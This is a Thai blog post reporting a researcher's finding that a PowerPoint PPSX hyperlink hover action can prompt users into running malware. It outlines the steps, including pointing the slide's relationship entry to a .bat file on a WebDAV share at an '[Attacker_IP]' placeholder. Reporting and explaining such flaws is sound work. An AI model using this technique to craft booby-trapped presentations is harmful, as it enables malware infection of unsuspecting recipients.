◐◑↔โปรแกรมยอดนิยม พบช่องโหว่ แค่เอาเมาส์ชี้เหนือลิงก์ ก็มีสิทธิ์ติดมัลแวร์

เฮดบล็อก ....ญามี่



พบช่องโหว่ใน PowerPoint แค่เอาเมาส์ชี้เหนือลิงก์ ก็มีสิทธิ์ติดมัลแวร์



ภาพ วิกิพีเดีย

ไมโครซอฟท์ พาวเวอร์พอยต์


Mandar Satam นักวิจัยความปลอดภัยอิสระ ค้นพบช่องโหว่ที่สามารถใช้โจมตีผ่านไฟล์ PowerPoint ได้ อย่างไรก็ตาม ทาง Microsoft กลับมองว่านี่ไม่ใช่ช่องโหว่แต่อย่างใด



จากผลการวิจัยของ Satam เขาพบว่า ในระบบการทำงานของ PowerPoint นั้น สามารถที่จะกำหนด "รูปแบบการกระทำ" ที่จะเกิดขึ้นเมื่อเอาเมาส์ไปชี้เหนือ Hypertext link ได้ โดยการสร้างไฟล์สไลด์ขึ้นมาในรูปแบบของ Open XML Slide Show ที่เรียกว่า PPSX มันเป็นไฟล์ PowerPoint ชนิดหนึ่งที่ออกแบบมาเพื่อใช้ในการเล่นพรีเซนเทชันเพียงอย่างเดียว ไม่สามารถแก้ไขได้ จากนั้นก็ตั้งค่า "Action" ของ HyperLink ให้เป็น "Other file"





ภาพ วิกิพีเดีย



หลังจากนั้นก็เข้าไปแก้ไขไฟล์ PPSX ที่สร้างขึ้นมาด้วยโปรแกรม ZIP เปลี่ยนค่า rID ที่อยู่ใน "pptslides_relsslide1.xml.rels" ให้เชื่อมต่อไปยัง "file:///[Attacker_IP]webdavfolderfile.bat"



เท่านี้เมื่อผู้ใช้เอาเมาส์ไปลอยชี้เหนือลิงก์ใน PowerPoint จากนั้นทันทีที่ผู้ใช้เอาเมาส์ไปชี้เหนือลิงก์ หน้าต่าง Pop-ups จะเด้งขึ้นมาทันที หากผู้ใช้คลิกตกลงไป ก็จะสามารถติดตั้งมัลแวร์ลงในเครื่องได้ทันที






คลิกเพื่อชมภาพและอ่านต่อ...





ขอบคุณของแต่งบล็อกโดย...

ไลน์สวยๆโดย...ญามี่  / ภาพกรอบ กรอบ goffymew / โค๊ตบล็อกสำหรัมือใหม่ กุ๊กไก่ / เฮดบล็อก เรือนเรไร /ไอคอน ชมพร / สีแต่งบล็อก Zairill /ภาพไอคอนRainfall in August แบนด์..การ์ตูน ไลน์น่ารักๆๆจาก... oranuch_sri



Create Date : 11 เมษายน 2563
Last Update : 11 เมษายน 2563 20:53:16 น.
Counter : 1181 Pageviews.		  
0 comments
Share
ชุดชามสัมผัส PCX แตก (เปลี่ยนวันที่ 8 มีนาคม 2568) Emmy Journey พากิน พาเที่ยว
(26 มิ.ย. 2568 16:20:19 น.)		Benz CLS มือสอง ซื้อ/ขาย รถ Mercedes-Benz ราคาถูก สภาพดี สมาชิกหมายเลข 8853974
(28 พ.ค. 2568 20:25:54 น.)
รถ สำหรับเราคือพาหนะสำหรับเดินทางที่ปลอดภัย . Lease รถใหม่สามปี newyorknurse
(22 เม.ย. 2568 02:35:36 น.)		AIตอนที่3: AI ในการประยุกต์ใช้งานจริง peaceplay
(10 เม.ย. 2568 18:03:38 น.)
ชื่อ : * blog นี้ comment ได้เฉพาะสมาชิก
Comment :
 *ส่วน comment ไม่สามารถใช้ javascript และ style sheet
 

Knowledge-dd.BlogGang.com

สมาชิกหมายเลข 4149951
Location :
  

[ดู Profile ทั้งหมด]
 ผู้ติดตามบล็อก : 14 คน [?]

บทความทั้งหมด